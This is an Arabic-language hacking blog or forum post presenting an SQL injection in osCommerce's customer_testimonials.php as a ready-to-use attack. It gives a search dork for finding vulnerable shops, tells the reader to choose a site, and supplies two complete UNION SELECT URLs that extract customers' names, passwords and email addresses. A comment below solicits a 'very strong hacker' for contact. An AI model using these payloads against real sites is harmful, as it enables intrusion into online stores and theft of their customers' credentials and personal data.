بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
اليوم جبت لكم ثغرة في مواقع Oscommerce وهذه المواقع معروفة بأنها مواقع شوب
طيب الثغرة إلّي معانا هي حقن قاعدة البيانات (SQL Injection Vulnerability)
كود PHP:
osCommerce 'customer_testimonials.php' SQL Injection Vulnerability
كود PHP:
http://www.securityfocus.com/bid/27664/exploit
شرح الثغرة :
السكربت المصاب
كود PHP:
osCommerce 3.1
كود PHP:
inurl:"customer_testimonials.php?testimonial_id="
إختر موقع ثم أكتب التالي :
كود PHP:
http://www.site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
كود PHP:
http://www.site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers
2 التعليقات:
مطلووب هكر قوي جدا يفضل ان يكون في الاردن حتى التقي به واذا لم يكن ما في مشكله
الرجاء اضافتي والتحدث معي على shoox91@gmail.com.........
mercieeeee
إرسال تعليق